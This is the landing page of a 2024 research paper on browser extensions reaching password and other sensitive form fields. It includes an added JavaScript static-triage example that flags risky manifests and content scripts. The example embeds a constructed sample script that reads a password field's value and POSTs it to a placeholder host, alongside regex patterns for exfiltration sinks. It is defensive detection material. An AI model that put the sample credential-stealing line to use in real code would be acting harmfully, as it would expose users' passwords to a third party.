DOI: 10.1145/3589334.3645683
Research article (Open access)

Experimental Security Analysis of Sensitive Data Access by Browser Extensions

Published: 13 May 2024

Abstract

Browser extensions offer a variety of valuable features and functionalities. They also pose a significant security risk if not properly designed or reviewed. Prior work has shown that browser extensions can access and manipulate data fields, including sensitive data such as passwords, credit card numbers, and Social Security numbers. In this paper, we present an empirical study of the security risks posed by browser extensions. Specifically, we first build a proof-of-concept extension that can steal sensitive user information. We find that the extension passes the Chrome Web Store review process. We then perform a measurement study on the top 10K website login pages to check whether an extension can access password fields via JavaScript. We find that none of the password fields are actively protected, and that they can be accessed using JavaScript. Moreover, we found that 1K websites store passwords in plaintext in their page source, including popular websites like Google.com and Cloudflare.com. We also analyzed over 160K Chrome Web Store extensions for malicious behavior, finding that 28K have permission to access sensitive fields and 190 store password fields in variables. To analyze the behavioral workflow of the potentially malicious extensions, we propose an LLM-driven framework, Extension Reviewer. Finally, we discuss two countermeasures to address these risks: a bolt-on JavaScript package for immediate adoption by website developers, allowing them to protect sensitive input fields, and a browser-level solution that alerts users when an extension accesses sensitive input fields. Our research highlights the urgent need for improved security measures to protect sensitive user information online.
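The abstract reports two measurements over Web Store extensions: how many hold permissions that let them reach sensitive fields on arbitrary pages, and how many content scripts select password fields and keep them in variables. The following is an added example, not the paper's tooling or code, of how a static triage of an extension package can check both conditions from its manifest and content scripts. The host-pattern set, the regular expressions and the "review"/"exfil-suspect" verdict are this example's own assumptions; the sample manifest and content script are constructed, not taken from any real extension.

```javascript
// Added example (not from the paper): static triage of a Chrome extension package.
// Two checks, both heuristics assumed by this example rather than the paper's method:
//  1. manifest triage: can the extension run script in the DOM of arbitrary origins?
//  2. source triage: does a content script select password fields, keep a handle to
//     them in a variable, read .value, and have a network or messaging sink?

// Host match patterns that grant access to every origin.
const ALL_HOST_PATTERNS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

function isAllHosts(pattern) {
  return ALL_HOST_PATTERNS.has(String(pattern).trim());
}

// Returns the reasons an extension can reach the DOM of arbitrary pages.
// Handles MV2 (host patterns inside "permissions") and MV3 ("host_permissions").
function broadDomAccess(manifest) {
  const reasons = [];
  for (const cs of manifest.content_scripts || []) {
    const matches = cs.matches || [];
    if (matches.some(isAllHosts)) {
      reasons.push(`content_scripts injected on ${matches.filter(isAllHosts).join(', ')}`);
    }
  }
  const declared = [
    ...(manifest.host_permissions || []),
    ...(manifest.optional_host_permissions || []),
    ...(manifest.permissions || []),
  ];
  const broadHosts = declared.filter(isAllHosts);
  if (broadHosts.length > 0) {
    reasons.push(`host permission ${broadHosts.join(', ')}`);
    // With broad hosts, "scripting" (MV3) or "tabs" (MV2) lets the background
    // script inject code on demand even without a declared content script.
    const perms = manifest.permissions || [];
    if (perms.includes('scripting') || perms.includes('tabs')) {
      reasons.push('programmatic injection via scripting/tabs API');
    }
  }
  return reasons;
}

// Heuristic source patterns (assumptions of this example, tuned for readable source).
const SELECTS_PASSWORD = /\[\s*type\s*=\s*["']?password["']?\s*\]|\.type\s*===?\s*["']password["']/i;
const STORES_PASSWORD_FIELD =
  /\b(?:const|let|var)\s+\w+\s*=[^;\n]*\[\s*type\s*=\s*["']?password["']?\s*\]/i;
const READS_VALUE = /\.value\b/;
const EXFIL_SINKS = /\b(?:fetch|XMLHttpRequest|sendBeacon|chrome\.runtime\.sendMessage)\b/;

function scanContentScript(source) {
  return {
    selectsPasswordField: SELECTS_PASSWORD.test(source),
    storesInVariable: STORES_PASSWORD_FIELD.test(source),
    readsValue: READS_VALUE.test(source),
    hasExfilSink: EXFIL_SINKS.test(source),
  };
}

// Verdict: "review" when the extension can reach arbitrary pages and a content
// script selects password fields; "exfil-suspect" when that script also reads
// the field value and contains a network or messaging sink.
function triage(manifest, scripts) {
  const access = broadDomAccess(manifest);
  const findings = scripts.map(scanContentScript);
  const selects = findings.some((f) => f.selectsPasswordField);
  const leaks = findings.some((f) => f.selectsPasswordField && f.readsValue && f.hasExfilSink);
  let verdict = 'low';
  if (access.length > 0 && selects) verdict = leaks ? 'exfil-suspect' : 'review';
  return { verdict, access, findings };
}

// Constructed sample package (not a real Web Store extension).
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'Form Helper (constructed sample)',
  permissions: ['scripting', 'storage'],
  host_permissions: ['<all_urls>'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'], run_at: 'document_idle' }],
};

const SAMPLE_CONTENT_JS = `
  const pw = document.querySelector('input[type="password"]');
  document.addEventListener('submit', () => {
    if (pw) fetch('https://example.invalid/c', { method: 'POST', body: pw.value });
  });
`;

function demo() {
  return triage(SAMPLE_MANIFEST, [SAMPLE_CONTENT_JS]);
}

console.log(JSON.stringify(demo(), null, 2));
```

The regex stage only finds what readable source shows; minified or obfuscated scripts, selectors built at runtime, and field handles passed through message channels escape it, which is why a verdict of "review" is a queue for deeper (dataflow or, as the paper proposes, LLM-assisted) analysis rather than a finding in itself.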

Supplemental Material

  • Video presentation (MP4 file)
  • Supplemental video (MP4 file)


Published In

WWW '24: Proceedings of the ACM Web Conference 2024
May 2024
4826 pages
ISBN:9798400701719
DOI:10.1145/3589334
This work is licensed under a Creative Commons Attribution-NonCommercial International 4.0 License.

Publisher

Association for Computing Machinery

New York, NY, United States


Author Tags

  1. browser extensions
  2. browser vulnerabilities
  3. chrome web store
  4. data privacy
  5. sensitive data access

Qualifiers

  • Research-article

Conference

WWW '24: The ACM Web Conference 2024
May 13 - 17, 2024
Singapore, Singapore

Acceptance Rates

Overall Acceptance Rate 1,899 of 8,196 submissions, 23%

Article Metrics (downloads reflected up to 05 Mar 2025)

  • Total citations: 0
  • Total downloads: 564 (last 12 months: 564; last 6 weeks: 68)
